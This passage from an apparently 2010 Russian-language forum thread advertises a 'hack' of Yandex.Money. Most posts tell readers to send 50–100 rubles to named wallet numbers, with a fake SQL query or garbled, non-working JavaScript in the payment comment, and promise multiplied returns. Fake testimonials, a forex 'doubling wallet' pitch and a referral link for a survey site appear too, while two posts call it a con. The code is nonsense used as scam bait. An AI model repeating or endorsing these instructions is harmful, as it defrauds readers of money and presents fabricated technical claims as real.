Я искал про взлом способы  ни где не получалось !!!! Пока не нашел один из форумов где все таки мне повезло и у меня получилось взломать! Смотрите по этой ссылке кто хочет реальных денег http://vzlom.speak.su/viewtopic.php?id=2

0

21

ХаКерЪ2010 написал(а):

41001699642556
Взлом СНОВО РАБОТАЕТ!
Уважаемые пользователи Яндекс денег!
До сих пор ещё существует самы настоящий взлом!
И сейчас я раскажу какой!
ВЗЛОМ:
Заводим свой собственный кошелёк(Это здесь: money.yandex.ru)
Ложим на счёт 50,60,70,80,90,100 руб!
И не больше и не меньше(50-100)
И нажимаем кнопку перевести!
При переводе:
Перевод на счёт!Номер получателя: 41001699642556
Сумма к получению 50-100 руб!Но не больше и не меньше!А то деньги не прийдут!
Сообщение к получателю:
SELECT MONEY(DISTINCT cc.cash_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.cash_group = 'money' AND cc.cash_type = 'money' AND r.cash_id = cc.cash_id AND n.cash_id = cc.cash_id AND r.region_id = '9' AND n.model_id = «Ваш номер кошелька» AND singer_id = '{500}-50,{1000}-100{reload}''
Нечего кроме номера кошелька не менять а то деньги не прийдут!!!
Название платежа: cc.cash.id
Если не ввести сообщение получателя и название платежа деньги не прийдут!
Нажимаем перевести и через 5-10 мин вам приходят:
Если вы кинули 50 рублей будет 500,а если 100 будет 1000!!!
Если 60 руб будет 600 и т.д =)
Не теряйте надежду в взломе!
Предупреждаю!Делать только 3 раза на дню а то яндекс деньги спалят!!!
Взлом рабочий!
ВЗЛОМ 100% РАБОЧИЙ

Огромное спасибо! все работает.

0

22

Регистрация http://www.AWSurveys.com/HomeMain.cfm?RefID=overta777

Инструкция:

1. Нажимаем Create A Free Account
UserName - имя пользователя
Password - пароль 7-15 знаков
First Name - имя
Last Name - Фамилия
Email Address - почтовый ящик
Далее вводим циферки-буковки, нажимаем кнопку Create A Free Account
Вы зарегистрировались!
2. Далее видим таблицу, имеющую такой вид:
The Following Surveys are Available:
Welcome Survey -- A долларов6. 00 Website Evaluation is Available.
A 4.00 Website Evaluation is Available.
A 4. 00 Website Evaluation is Available.
A 4. 00 Website Evaluation is Available.
A 4. 00 Website Evaluation is Available.
A 4. 00 Website Evaluation is Available.
A February Bonus Website Evaluation is Available.
3. Щелкаем по одной из ссылок на этой странице, попадаем на следующую страницу
(тут нам радостно сообщают, что нам заплатят 6 долларов) и там щелкаем по надписи "Start Survey Now"
4. тут 2 ссылки и 2 поля, в них надо написать отзыв о сайте на англ языке.
Кто не силен, пишу шаблон-пример: It is an excellent site, I shall advise its all!
5. Щелкаем по кнопке внизу "Click to submit . . . " Переместились на страницу, на которой нам сообщают, что на наш баланс зачислено 6 долларов.
Щелкаем по ссылке "Click Here to go Home and. . . "
6. И так далее по ссылочкам.
7. Для вывода денег воспользуйтесь кнопкой "Redeem Money"
Один день 27 долларов за 10 мин без проблем!!!!!!!!!!!!!
В верху вы видите: Refer friends-заходите, ниже вы видите вашу ссылку в зеленом прямоугольнике, это ваша ссылка для приглашения людей, за каждого
приглашенного вами по 1.25 доллара. Через некоторое время будут ещё по являться рекламные ссылки за который вам будут начислять по 1 доллар.

0

23

А если я просто напишу свой номер кошелька 41001749762763 , и скажу что мне в кровь нужны деньги, Вы поверите?...

0

24

Многие кошельки уже не работают, вот нашол рабочий!!!Hомер кошельа Яндекс Деньги: 41001738225630 спешите пока есть деньги!!! Удачи!!!

0

25

КАК ВЫ ЕЩЕ ВЕРЕТИ В ЭТУ ЕРУНДУ!!!!!ЗАДУМАЙТЕСЬ!!!!!

0

26

вот реально рабочий яндекс кошелек 41001368700042! отсылал по 100 минут через пять приходит по 300, уже неделю его разоряю!
P.S. больше раза в сутки  пока не рисковал так делать!

0

27

Хотите знать правду о волшебных кошельках? Я больше 3 лет зарабатываю на рынке forex. Нет никаких "Волшебных" кошельков, есть валютные или инвестиционные. Каждый кошелек должен быть зарегистрирован в системе Forex. Их не много, но они есть. У меня имеется 4 таких кошелька, которые исправно работают, без обмана увеличивают в 2 раза. Единственный минус, приходится ждать минут 40. Все 4 кошелька надежный и проверенный  R135373439751 . Отправлять надо не менее 40 руб. Не в коем случае не отправляйте более 150 руб, система не принимает, и может не вернуть

0

28

я увидел короче в сети волшебный кошелек типо.ну я сразу понял что это вся наколка.но все же хотел проверить.отправил на этот кошелек 41001774242674 10р,(сам не поверил)пришло 30.Потом еще отправил 100 ни фига не пришло.Ща каждый день отправляю по 10-30р.конечно это не много,но это не обман.Помойму лучше мало,чем ничего

0

29

Запомните, что нету волшебных кошельков и программ для взлома. Программы для взлома это вирус который считывает ваш пароль и отправляет своему хозяину по эл.почте ваш платежные данные. Как-то я писала на форуме про взлом и как взломать яндекс деньги. Для этого написал специальный скрип для одного кошелька чтоб он давал сбой и присылал на ваш счет 300 рублей. Но какой-то один не умный человек взял и выложил видео в поисковую систему яндекс и старый форум wzlom.mybb.ru сразу же закрыли. Мне пришлось переделывать скрипт по новой искать дыры в системе яндекс.этот способ опять работает. И так начнем. Для начала нужно завести кошелек в системе яндекс и положить рублей 60 через терминал оплаты сот. связи ну или каким то другим способом. Потом нужно перевести ровно 50 рублей не больше не меньше на этот номер счета
41001313590768

В комментарии нужно скопировать этот скрипт:

<script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font]

В течении 5 минут обновляете страницу и вам на счет должны прийти 300 рублей. Это хороший способ нажиться на этом!Этим можно пользоваться только один раз в день чтобы страждущие админы яндекса непропалили этот способ.
Уверяю вас этот способ работает!!! Проверено многими пользователями.
Вот самый новый способ пользуйтесь пока не поздно,я уже заработал кучу бабок!!

0

30

ЗДРАВСТВУЙТЕ! Я ОЧЕНЬ ДАВНИЙ ПОЛЬЗОВАТЕЛЬ ЯНДЕКС.ДЕНЕГ. НА СЕКРЕТНОМ САЙТЕ(это как бы клон сайта Яндекс). И ТАМ ХАКЕРЫ ПРИДУМАЛИ ОДНУ ВЕЩЬ: ОНИ СОЗДАЛИ КОШЕЛЕК И ПО ХАКЕРСКИ ЗАКАЧАЛИ ТУДА ПРОГРАММКУ. ЭТО ПРОГРАММА РАБОТАЕТ ТАК: КИДАЕШЬ ТУДА ДЕНЬГИ ОТ 3 до 500 РУБЛЕЙ, А ЧЕРЕЗ 15-30 МИНУТ НА ТВОЙ КОШЕЛЕК ПРИХОДЯТ ЭТИ ДЕНЬГИ В 1.5 раза увеличенные. НО ЭТО РАБОТАЕТ 3 РАЗА В ДЕНЬ, А ТО ВАШ КОШЕЛЕК ОПУСТОТИТЬСЯ. МЕНЯ ХОТЕЛИ ПРИГЛАСИТЬ ТУДА НО Я НЕ СОГЛАСИЛСЯ. Я УЖЕ МЕСЯЦ ТАК ЗАРАБАТЫВАЮ, до 250 РУБЛЕЙ В ДЕНЬ. ВОТ ЭТОТ КОШЕЛЕК 41001771657458. Я ТОЛЬКО ЭТОМУ САЙТУ СКАЗАЛ, СНАЧАЛО НЕ ХОТЕЛ ГОВОРИТЬ НО МНЕ НЕ ЖАЛКО. ЭТО СЕКРЕТНО Я УЗНАЛ! УДАЧИ.

Отредактировано Олег Н. (2010-12-15 19:25:10)

0


Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%